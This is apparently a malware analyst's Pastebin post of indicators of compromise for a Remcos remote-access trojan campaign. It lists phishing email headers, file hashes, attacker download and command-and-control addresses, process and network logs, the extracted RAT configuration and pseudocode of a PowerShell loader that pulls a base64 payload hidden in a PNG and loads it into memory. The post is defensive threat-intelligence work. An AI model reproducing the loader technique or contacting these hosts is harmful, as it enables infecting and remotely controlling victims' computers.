Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #remcos #RAT #stego #pngbase64 #RegAsm #PowerShell
- https://pastebin.com/EvXHfZUB
- previous_contact:
- 18/01/24 https://pastebin.com/FL2fX362
- 25/12/23 https://pastebin.com/D535PVm3
- 21/12/23 https://pastebin.com/samYnJq6
- 30/11/23 https://pastebin.com/aG6XyqHN
- 13/11/23 https://pastebin.com/tbRpiGG5
- 06/02/23 https://pastebin.com/kjv5E8Au
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
- attack_vector
- --------------
- email attach .docx (T1221) > get .doc (11882) > get .vbs > get base64 > get .png (stego) > get .txt > decode > inject RegAsm.exe > C2
- # # # # # # # #
- email_headers
- # # # # # # # #
- Date: 18 Jan 2024 22:57:35 -0800
- From: Velislav Deshev<info@cifogge.ooguy.com>
- Subject: RE: Потвърждение за плащане на фактура
- Received: from unknown (HELO mail0.cifogge.ooguy.com) ([79_141_163_23])
- Message-ID: <20240118225734.55E14297A16A5D59@cifogge.ooguy.com>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 fb4bc1cb8305aee8f54e592dd5fb22d4d84838d371d65521e103306ad929c9cd
- File name swift 19-1-2024.docx [ Microsoft Word 2007+ ] !Template Injection
- File size 30.64 KB (31376 bytes)
- SHA-256 f745310bf10c1bc657b89f10f740c372bdf0cabed4b0f4f93782a6762fc6a38c
- File name microsoftdecidedtoup....doc [ Rich Text Format ] !11882 EQUATION
- File size 57.77 KB (59160 bytes)
- SHA-256 5f7a77697b2eb9acc01489265be5c49dbba8aa1ea12f28930103abe205db7baa
- File name AItechnology.vbs [ JavaScript ] !Detect sandbox
- File size 13.94 KB (14272 bytes)
- SHA-256 e9be870a568580ab6b5d0998e0170a230ddc2eb06698307f1bb9ced590ca14a4
- File name UE4Lk [ JavaScript ] !Base64 2 PowerShell
- File size 46.70 KB (47816 bytes)
- SHA-256 f6dc3dc76e0d6e8d2035112c83a31aebbcc91656ec4202ffda6e08f591acd991
- File name uwp4228677.png [ PNG image data ] !Stego Loader BASE64_START
- File size 17.73 MB (18594320 bytes)
- SHA-256 e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042
- File name GRM.txt [ Reverse Base64 ] !REMCOS encoded payload
- File size 644.00 KB (659456 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR wallpapercave_com / uwp / uwp4228677.png (LOADER)
- 172_232_189_7 / 5060 / GRM.txt (REMCOS)
- C2 top_noforabusers1_xyz 147_124_215_172 : 2424
- netwrk
- --------------
- 104_21_64_92 dik_si 80 HTTP HEAD /wOBjE HTTP/1.1 Microsoft Office Existence Discovery
- 172_232_189_7 172_232_189_7 80 HTTP GET /ait/microsoftdecidedtoupdateentireprocessfromtheserviceofmsofficetoinbuildtechnologytoimplementtheprocess.doc ms-office;
- 172_232_189_7 172_232_189_7 80 HTTP GET /5060/AItechnology.vbs HTTP/1.1 Mozilla/4.0
- 188_114_97_9 paste_ee 80 HTTP GET /d/UE4Lk HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- 188_114_97_9 paste_ee 443 TLSv1 Client Hello
- 104_22_53_71 wallpapercave_com 443 TLSv1.2 Client Hello
- 172_232_189_7 172_232_189_7 80 HTTP GET /5060/GRM.txt HTTP/1.1
- 147_124_215_172 2424 TLSv1.3 Client Hello
- comp
- --------------
- WINWORD.EXE TCP 104_21_64_92 80 ESTABLISHED
- WINWORD.EXE TCP 172_232_189_7 80 ESTABLISHED
- EQNEDT32.EXE TCP 172_232_189_7 80 ESTABLISHED
- WScript.exe TCP 188_114_97_9 443 ESTABLISHED
- powershell.exe TCP 104_22_53_71 443 ESTABLISHED
- powershell.exe TCP 172_232_189_7 80 CLOSE_WAIT
- RegAsm.exe TCP 147_124_215_172 2424 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
- "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\AItechnology.vbs"
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = . . .
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . . . ('172_232_189_7 / 5060 / GRM.txt' , 'C:\ProgramData\', 'LnkName','RegAsm')
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Copy-Item -Destination C:\ProgramData\Regasm.vbs
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19.01.2024 14:09
- Path File not found: C:\ProgramData\Regasm.vbs.exe
- drop
- --------------
- %temp%\Temporary Internet Files\Content.IE5\*\AItechnology[1].vbs
- C:\Users\operator\AppData\Roaming\AItechnology[1].vbs
- # # # # # # # #
- additional info
- # # # # # # # #
- powershell load remcos:
- --------------
- image_Url = 'wallpapercave_com / uwp / uwp4228677.png'
- web_Client = System.Net.WebClient
- image_Bytes = DownloadData(image_Url)
- image_Text = UTF8.GetString(image_Bytes)
- start_Flag = <<BASE64_START>>; endFlag = <<BASE64_END>>
- base64_Command = image_Text_Substring
- command_Bytes = Convert ::From_Base64String
- loaded_Assembly = [System_Reflection.Assembly] :: Load (command_Bytes)
- type = loaded_Assembly_GetType (Aspose.DrawingSpec.PkikAttrCertNB)
- method = Run . Invoke 172_232_189_7 / 5060 / GRM.txt desativado Regasm C:\ProgramData\ LnkName RegAsm
- remcos config
- --------------
- {
- "Version": "4.9.3 Pro",
- "Host:Port:Password": "top_noforabusers1_xyz : 2424 : 1",
- "Assigned name": "RemoteHost",
- "Connect interval": "1",
- "Install flag": "Disable",
- "Setup HKCU\\Run": "Enable",
- "Setup HKLM\\Run": "Enable",
- "Install path": "Application path",
- "Copy file": "remcos.exe",
- "Startup value": "Disable",
- "Hide file": "Disable",
- "Mutex": "Rmc-M4OLK2",
- "Keylog flag": "0",
- "Keylog path": "Application path",
- "Keylog file": "logs.dat",
- "Keylog crypt": "Disable",
- "Hide keylog file": "Disable",
- "Screenshot flag": "Disable",
- "Screenshot time": "10",
- "Take Screenshot option": "Disable",
- "Take screenshot title": "",
- "Take screenshot time": "5",
- "Screenshot path": "AppData",
- "Screenshot file": "Screenshots",
- "Screenshot crypt": "Disable",
- "Mouse option": "Disable",
- "Delete file": "Disable",
- "Audio record time": "5"
- }
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/fb4bc1cb8305aee8f54e592dd5fb22d4d84838d371d65521e103306ad929c9cd/details
- https://www.virustotal.com/gui/file/f745310bf10c1bc657b89f10f740c372bdf0cabed4b0f4f93782a6762fc6a38c/details
- https://www.virustotal.com/gui/file/5f7a77697b2eb9acc01489265be5c49dbba8aa1ea12f28930103abe205db7baa/details
- https://www.virustotal.com/gui/file/e9be870a568580ab6b5d0998e0170a230ddc2eb06698307f1bb9ced590ca14a4/details
- https://www.virustotal.com/gui/file/f6dc3dc76e0d6e8d2035112c83a31aebbcc91656ec4202ffda6e08f591acd991/details
- https://www.virustotal.com/gui/file/e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042/details
- VR
Add Comment
Please, Sign In to add comment